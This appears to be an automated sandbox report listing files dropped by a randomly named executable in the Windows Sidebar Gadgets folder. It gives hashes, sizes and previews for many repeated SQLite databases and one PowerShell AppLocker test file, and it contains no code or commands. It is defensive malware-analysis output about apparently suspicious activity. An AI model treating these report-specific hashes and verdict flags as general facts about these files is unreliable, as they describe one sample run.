                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
